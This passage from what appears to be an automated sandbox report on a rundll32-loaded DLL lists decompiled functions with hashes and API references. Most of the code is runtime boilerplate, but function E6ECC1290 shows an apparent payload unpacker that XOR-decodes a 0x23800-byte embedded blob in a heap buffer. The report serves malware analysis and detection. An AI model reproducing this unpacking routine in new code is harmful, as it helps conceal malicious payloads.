											E6ECDCA96( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6ECDC781(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6ECDCA96( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6ed1e174 - _t72; // 0x0
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6ECDCFFD(__ebx, _t61, 1, __esi);
						E6ECDCEB9();
						E6ECDD31B();
						 *0x6ed1e4b8 =  *0x6ed1e4b8 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6ECDC970();
						_t54 = E6ECDD19E(_t61,  *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6ECDC97D();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x6ecdc8db
0x6ecdc8db
0x6ecdc8db
0x6ecdc8dd
0x6ecdc8e2
0x6ecdc8e7
0x6ecdc8ee
0x6ecdc8f5
0x6ecdc8fd
0x6ecdc900
0x6ecdc909
0x6ecdc90c
0x6ecdc90f
0x6ecdc916
0x6ecdc985
0x6ecdc98a
0x6ecdc98b
0x6ecdc98d
0x6ecdc992
0x6ecdc997
0x6ecdc99a
0x6ecdc99c
0x6ecdc9ad
0x6ecdc9ad
0x6ecdc9b1
0x6ecdc9b4
0x6ecdc9c0
0x6ecdc9c0
0x6ecdc9cd
0x6ecdc9cf
0x6ecdc9d2
0x6ecdc9d4
0x6ecdc9df
0x6ecdc9e4
0x6ecdc9e6
0x6ecdc9e9
0x6ecdc9eb
0x00000000
0x00000000
0x6ecdc9eb
0x6ecdc9b6
0x6ecdc9b6
0x6ecdc9b9
0x00000000
0x6ecdc9bb
0x6ecdc9bb
0x6ecdc9f1
0x6ecdc9f1
0x6ecdc9f6
0x6ecdc9fb
0x6ecdc9fd
0x6ecdca00
0x6ecdca03
0x6ecdca05
0x6ecdca07
0x6ecdca09
0x6ecdca0e
0x6ecdca13
0x6ecdca15
0x6ecdca15
0x6ecdca1b
0x6ecdca1c
0x6ecdca21
0x6ecdca27
0x6ecdca27
0x6ecdca07
0x6ecdca2c
0x6ecdca2e
0x6ecdca35
0x6ecdca3f
0x6ecdca41
0x6ecdca44
0x6ecdca46
0x6ecdca52
0x6ecdca7a
0x6ecdca7a
0x6ecdca30
0x6ecdca30
0x6ecdca33
0x00000000
0x00000000
0x6ecdca33
0x6ecdca2e
0x6ecdc9b9
0x6ecdca7d
0x6ecdca84
0x6ecdc99e
0x6ecdc99e
0x6ecdc9a4
0x00000000
0x6ecdc9a6
0x6ecdc9a6
0x6ecdc9a6
0x6ecdc9a4
0x6ecdca89
0x6ecdca95
0x6ecdc918
0x6ecdc918
0x6ecdc91d
0x6ecdc922
0x6ecdc927
0x6ecdc92e
0x6ecdc932
0x6ecdc93c
0x6ecdc948
0x6ecdc94a
0x6ecdc94a
0x6ecdc94c
0x6ecdc94f
0x6ecdc956
0x6ecdc95b
0x00000000
0x6ecdc95b
0x6ecdc8f0
0x6ecdc8f0
0x6ecdc95d
0x6ecdc960
0x6ecdc96c
0x6ecdc96c

APIs

__RTC_Initialize.LIBCMT ref: 6ECDC922
___scrt_uninitialize_crt.LIBCMT ref: 6ECDC93C

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 9dabd2b21c25deedd40773a72e2ddabe65c93794d082036fe0969a31126a0c9a
Instruction ID: 3481ec5c8b97cd3664e9f8471920b63672aabd43bcdbae01d3e98d05455bde0c
Opcode Fuzzy Hash: 9dabd2b21c25deedd40773a72e2ddabe65c93794d082036fe0969a31126a0c9a
Instruction Fuzzy Hash: B8411672D04215AFDB10DFE9C840FEE7AB8EF81B64F014515EA186F284E732491ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDC98B, Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E6ECDC98B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;
				void* _t53;

				_t53 = __fp0;
				_t40 = __edx;
				_push(0xc);
				_push(0x6ed1afa8);
				E6ECDD350(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6ECDCA96( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6ECDC781(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t26 = E6ECC1290(_t35, _t42, _t45, _t53,  *((intOrPtr*)(_t47 + 8)), _t42); // executed
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E6ECC1290(_t35, _t42, _t45, _t53,  *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6ECDC8DB(_t35, _t40, _t42, _t45, _t14, _t53);
								_pop(_t37);
								E6ECDCA96( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6ECDC781(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6ECDCA96( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6ed1e174 - _t42; // 0x0
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6ecdc98b
0x6ecdc98b
0x6ecdc98b
0x6ecdc98d
0x6ecdc992
0x6ecdc997
0x6ecdc99c
0x6ecdc9ad
0x6ecdc9ad
0x6ecdc9b1
0x6ecdc9b4
0x6ecdc9c0
0x6ecdc9c0
0x6ecdc9cd
0x6ecdc9cf
0x6ecdc9d2
0x6ecdc9d4
0x6ecdca7d
0x6ecdca7d
0x6ecdca84
0x6ecdca86
0x6ecdca89
0x6ecdca95
0x6ecdca95
0x6ecdc9df
0x6ecdc9e4
0x6ecdc9e6
0x6ecdc9e9
0x6ecdc9eb
0x00000000
0x00000000
0x6ecdc9f1
0x6ecdc9f1
0x6ecdc9f6
0x6ecdc9fb
0x6ecdc9fd
0x6ecdca00
0x6ecdca03
0x6ecdca05
0x6ecdca07
0x6ecdca09
0x6ecdca0e
0x6ecdca13
0x6ecdca15
0x6ecdca15
0x6ecdca1b
0x6ecdca1c
0x6ecdca21
0x6ecdca27
0x6ecdca27
0x6ecdca07
0x6ecdca2c
0x6ecdca2e
0x6ecdca35
0x6ecdca3f
0x6ecdca41
0x6ecdca44
0x6ecdca46
0x6ecdca52
0x6ecdca7a
0x6ecdca7a
0x00000000
0x6ecdca30
0x6ecdca30
0x6ecdca33
0x00000000
0x00000000
0x00000000
0x6ecdca33
0x6ecdca2e
0x6ecdc9b6
0x6ecdc9b9
0x00000000
0x00000000
0x6ecdc9bb
0x00000000
0x6ecdc9bb
0x6ecdc99e
0x6ecdc9a4
0x00000000
0x00000000
0x6ecdc9a6
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6ECDC9C8
dllmain_crt_dispatch.LIBCMT ref: 6ECDC9DF
dllmain_raw.LIBCMT ref: 6ECDCA27
dllmain_crt_dispatch.LIBCMT ref: 6ECDCA3A
dllmain_raw.LIBCMT ref: 6ECDCA4D

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 2781eefbb3f4664321facff03268290e9857acc60a04948e53fb0f4f7f21c162
Instruction ID: c88af0bcef8eb41fb8794d0570179c983f0cfc181afd6e3e3fbd1b8d1f1a657e
Opcode Fuzzy Hash: 2781eefbb3f4664321facff03268290e9857acc60a04948e53fb0f4f7f21c162
Instruction Fuzzy Hash: 2621B172D00215AFDB51DEE5C840EEF7A79EF81B94F014515FA185F254E7328D29CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC2A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6ECCC2A0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("api-ms-win-core-synch-l1-2-0"); // executed
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "WakeByAddressSingle");
				}
			}

0x6eccc2a5
0x6eccc2ad
0x6eccc2bc
0x6eccc2af
0x6eccc2bb
0x6eccc2bb

APIs

GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6ECCC2A5
GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6ECCC2B5

Strings

api-ms-win-core-synch-l1-2-0, xrefs: 6ECCC2A0
WakeByAddressSingle, xrefs: 6ECCC2AF

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1731903895
Opcode ID: ed375ac1087c36fe0ea835d512bea237fa6b870d27bc4f8b9507ba884439942f
Instruction ID: 94d1fb390d8c0af3d17ef6bc688d44462c89a9084488d8e605b2abf0c8f9fdb1
Opcode Fuzzy Hash: ed375ac1087c36fe0ea835d512bea237fa6b870d27bc4f8b9507ba884439942f
Instruction Fuzzy Hash: 52B092B1E086026B9E907BF15A1CAE62AB8A9E168230104446523E9200FA248418DA62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC320, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6ECCC320() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("api-ms-win-core-synch-l1-2-0"); // executed
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "WaitOnAddress");
				}
			}

0x6eccc325
0x6eccc32d
0x6eccc33c
0x6eccc32f
0x6eccc33b
0x6eccc33b

APIs

GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6ECCC325
GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6ECCC335

Strings

api-ms-win-core-synch-l1-2-0, xrefs: 6ECCC320
WaitOnAddress, xrefs: 6ECCC32F

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1891578837
Opcode ID: 0d3e6abc1cb0aded170fbe8d482202ceae9c072aa6c66eb75daf0deb774d95a4
Instruction ID: 513b3598b44bf4eb67a59735af1ff7b49b52d913cd1e52e16ef1c50f615aad1c
Opcode Fuzzy Hash: 0d3e6abc1cb0aded170fbe8d482202ceae9c072aa6c66eb75daf0deb774d95a4
Instruction Fuzzy Hash: 02B092B1E086016A9E50BBF16A0CAE62978A9E168230504406037D9202EA248015D922

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE4161, Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 19%

			E6ECE4161() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t10;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E6ECE412A(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = E6ECE4073(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t10 = E6ECE22E9(_t9); // executed
						_t26 = _t10;
						_push(0);
						if(_t26 != 0) {
							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(E6ECE4073() != 0) {
								E6ECE2C83(0);
								_t19 = _t26;
							} else {
								E6ECE2C83(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							E6ECE2C83();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}

0x6ece4167
0x6ece4169
0x6ece416f
0x6ece4173
0x6ece417b
0x6ece4180
0x6ece418e
0x6ece4191
0x6ece4199
0x6ece419e
0x6ece41ad
0x6ece41b2
0x6ece41b5
0x6ece41b8
0x6ece41cb
0x6ece41cc
0x6ece41cf
0x6ece41d0
0x6ece41d3
0x6ece41d4
0x6ece41d5
0x6ece41e0
0x6ece41eb
0x6ece41f0
0x6ece41e2
0x6ece41e3
0x6ece41e3
0x6ece41f4
0x6ece41fa
0x6ece41ba
0x6ece41ba
0x6ece41c1
0x6ece41c7
0x6ece41c7
0x6ece41a0
0x6ece41a1
0x6ece41a7
0x6ece41a7
0x6ece41fd
0x6ece4200

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6ECE4169

Part of subcall function 6ECE4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ECE61E2,?,00000000,-00000008), ref: 6ECE411F

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6ECE41A1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6ECE41C1

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: ffd7ba1d59b7cdb658fd152d557bed7afc38fbd106bf7b95e7a720de9a87a0a1
Instruction ID: c4efcc42a7a1f863a01bb69ccb8a70dba3c3ef156115d55c0342685dec15c803
Opcode Fuzzy Hash: ffd7ba1d59b7cdb658fd152d557bed7afc38fbd106bf7b95e7a720de9a87a0a1
Instruction Fuzzy Hash: 0311C4F2505A26BE6B0527F69C8ADAF6D7CFE962983000825F401D2504FF74DD0381B1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC1290, Relevance: 3.9, APIs: 3, Instructions: 137
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E6ECC1290(void* __ebx, void* __edi, void* __esi, void* __fp0, void* _a4, intOrPtr _a8) {
				void* _v16;
				intOrPtr _v112;
				void* __ebp;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t61;
				unsigned int _t62;
				signed char _t66;
				void* _t68;
				signed int _t69;
				unsigned int _t82;
				void* _t83;
				void** _t87;
				signed int _t88;
				void* _t102;
				void* _t103;
				void** _t105;
				void* _t108;
				signed int _t110;
				void* _t112;

				_t100 = __edi;
				_t80 = __ebx;
				_push(__ebx);
				_push(__edi);
				_t112 = (_t110 & 0xfffffff0) - 0x70;
				_t105 = _t112;
				_t105[0x16] = _t108;
				_t105[0x17] = _t112;
				_t105[0x1a] = 0xffffffff;
				_t105[0x19] = E6ECD3960;
				_t118 = _a8 - 1;
				_t105[0x18] =  *[fs:0x0];
				 *[fs:0x0] =  &(_t105[0x18]);
				if(_a8 != 1) {
					L14:
					_t53 = _t105[0x18];
					 *[fs:0x0] = _t53;
					return _t53;
				} else {
					asm("movaps xmm1, [0x6ecea1d0]");
					asm("xorps xmm0, xmm0");
					asm("movaps [esi+0x30], xmm0");
					_t105[0x10] = _a4;
					_t105[0x11] = 0;
					asm("movups [esi+0x48], xmm1");
					E6ECDBE60(_t118, __fp0);
					asm("movaps xmm0, [0x6ecea1e0]");
					_t105[2] = 0x4c6ed62a;
					_t105[3] = 0xd41b180a;
					_t105[4] = 0xe69c857c;
					_t105[5] = 0x15d8;
					asm("movups [esi+0x18], xmm0");
					_t105[0xa] = 0x5c3fff75;
					_t105[0xb] = 0x207661e;
					_t56 =  *0x6ed1e128; // 0xc40000
					if(_t56 != 0) {
						L4:
						_t57 = HeapAlloc(_t56, 0, 0x23800); // executed
						if(_t57 == 0) {
							goto L15;
						} else {
							 *_t105 = _t57;
							E6ECDD4D0(_t57, 0x6ecea230, 0x23800);
							_t61 = 0;
							asm("o16 nop [cs:eax+eax]");
							do {
								_t102 = 0xfffdc800;
								_t87 =  &(_t105[2]);
								_t82 = 0;
								_t105[1] = _t61;
								do {
									_t62 = _t82;
									_t82 = _t82 + 1;
									_t66 =  *(_t87 + ((_t62 >> 1) * 0x92492493 >> 0x20 >> 2) * 0xfffffff2) & 0x000000ff;
									_t87 =  &(_t87[0]);
									 *( *_t105 + _t102 + 0x23800) =  *( *_t105 + _t102 + 0x23800) ^ _t66;
									_t102 = _t102 + 1;
								} while (_t102 != 0);
								_t61 = _t105[1] + 1;
							} while (_t61 != 0x3e9);
							_t83 =  *_t105;
							_t68 = 0;
							asm("o16 nop [cs:eax+eax]");
							do {
								_t103 = 0xfffdc800;
								_t88 = 0;
								_t105[1] = _t68;
								asm("o16 nop [eax+eax]");
								do {
									_t69 = _t88;
									_t88 = _t88 + 1;
									 *(_t83 + _t103 + 0x23800) =  *(_t83 + _t103 + 0x23800) ^  *(_t103 + _t105 +  ~((_t69 * 0xaaaaaaab >> 0x00000020 >> 0x00000001 & 0xfffffff8) + 0xffffffff55555556) + 0x18 + 0x23800) & 0x000000ff;
									_t103 = _t103 + 1;
								} while (_t103 != 0);
								_t68 = _t105[1] + 1;
								_t128 = _t68 - 0x3e9;
							} while (_t68 != 0x3e9);
							_t105[0x1a] = 0;
							_t105[0xc] =  *_t105;
							_push( &(_t105[0xc]));
							E6ECDC050(_t128);
							HeapFree( *0x6ed1e128, 0,  *_t105);
							goto L14;
						}
					} else {
						_t56 = GetProcessHeap();
						if(_t56 == 0) {
							L15:
							E6ECE92F0(_t80, 0x23800, 1, _t100, _t105, __eflags);
							asm("ud2");
							_push(_t108);
							return E6ECC1000(_v112, 0x23800);
						} else {
							 *0x6ed1e128 = _t56;
							goto L4;
						}
					}
				}
			}

0x6ecc1290
0x6ecc1290
0x6ecc1293
0x6ecc1294
0x6ecc1299
0x6ecc129c
0x6ecc129e
0x6ecc12a4
0x6ecc12a7
0x6ecc12ae
0x6ecc12bf
0x6ecc12c2
0x6ecc12c5
0x6ecc12cc
0x6ecc143c
0x6ecc143c
0x6ecc143f
0x6ecc144c
0x6ecc12d2
0x6ecc12d5
0x6ecc12dc
0x6ecc12df
0x6ecc12e3
0x6ecc12e6
0x6ecc12ed
0x6ecc12f1
0x6ecc12f6
0x6ecc12fd
0x6ecc1304
0x6ecc130b
0x6ecc1312
0x6ecc1318
0x6ecc131c
0x6ecc1323
0x6ecc132a
0x6ecc1331
0x6ecc1345
0x6ecc134d
0x6ecc1354
0x00000000
0x6ecc135a
0x6ecc1364
0x6ecc1367
0x6ecc136f
0x6ecc1371
0x6ecc1380
0x6ecc1380
0x6ecc1385
0x6ecc1388
0x6ecc138a
0x6ecc1390
0x6ecc1390
0x6ecc1397
0x6ecc13a4
0x6ecc13a8
0x6ecc13a9
0x6ecc13b0
0x6ecc13b0
0x6ecc13b6
0x6ecc13b7
0x6ecc13be
0x6ecc13c0
0x6ecc13c2
0x6ecc13d0
0x6ecc13d0
0x6ecc13d5
0x6ecc13d7
0x6ecc13da
0x6ecc13e0
0x6ecc13e0
0x6ecc13e7
0x6ecc1400
0x6ecc1407
0x6ecc1407
0x6ecc140d
0x6ecc140e
0x6ecc140e
0x6ecc1417
0x6ecc141e
0x6ecc1424
0x6ecc1425
0x6ecc1437
0x00000000
0x6ecc1437
0x6ecc1333
0x6ecc1333
0x6ecc133a
0x6ecc144f
0x6ecc1459
0x6ecc145e
0x6ecc1460
0x6ecc147a
0x6ecc1340
0x6ecc1340
0x00000000
0x6ecc1340
0x6ecc133a
0x6ecc1331

APIs

Part of subcall function 6ECDBE60: GetTickCount64.KERNEL32 ref: 6ECDBE96
Part of subcall function 6ECDBE60: GetTickCount64.KERNEL32 ref: 6ECDBEB4
Part of subcall function 6ECDBE60: GetTickCount64.KERNEL32 ref: 6ECDBECD
Part of subcall function 6ECDBE60: GetTickCount64.KERNEL32 ref: 6ECDBECF
Part of subcall function 6ECDBE60: GetTickCount64.KERNEL32 ref: 6ECDBED6
Part of subcall function 6ECDBE60: GetTickCount64.KERNEL32 ref: 6ECDBEF4

GetProcessHeap.KERNEL32 ref: 6ECC1333
HeapAlloc.KERNEL32(00C40000,00000000,00023800), ref: 6ECC134D
HeapFree.KERNEL32(00000000), ref: 6ECC1437

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: Count64Tick$Heap$AllocFreeProcess
String ID:
API String ID: 2047189075-0
Opcode ID: c65bb5a5c6b0a08ff73bac50c85a0613d9974d28f29d851b53717efed3b5af6a
Instruction ID: cb3231a3e60403acbfdff35a989ca582635d5176dceffbc622aad44ca8006868
Opcode Fuzzy Hash: c65bb5a5c6b0a08ff73bac50c85a0613d9974d28f29d851b53717efed3b5af6a
Instruction Fuzzy Hash: D951C074A00B408BD320CF69C980A96BBF4FF49714F108A2DE9D68BB95E734F549CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDC7D4, Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E6ECDC7D4(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags, void* __fp0) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;
				void* _t140;

				_t140 = __fp0;
				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6ECDD350(__ebx, __edi, __esi);
				_t43 = E6ECDD02D(__ecx, __edx, 0); // executed
				_t90 = 0x6ed1af60;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6ECDCF32();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6ed1e4b8;
					if( *0x6ed1e4b8 != 0) {
						E6ECDD1CC(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6ed1af80);
						E6ECDD350(1, __edi, __esi);
						_t48 =  *0x6ed1e174; // 0x0
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6ed1e174 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6ECDCF32();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6ed1e4b8 - 2;
							if( *0x6ed1e4b8 != 2) {
								E6ECDD1CC(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6ed1afa8);
								E6ECDD350(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6ECDCA96( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6ECDC781(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
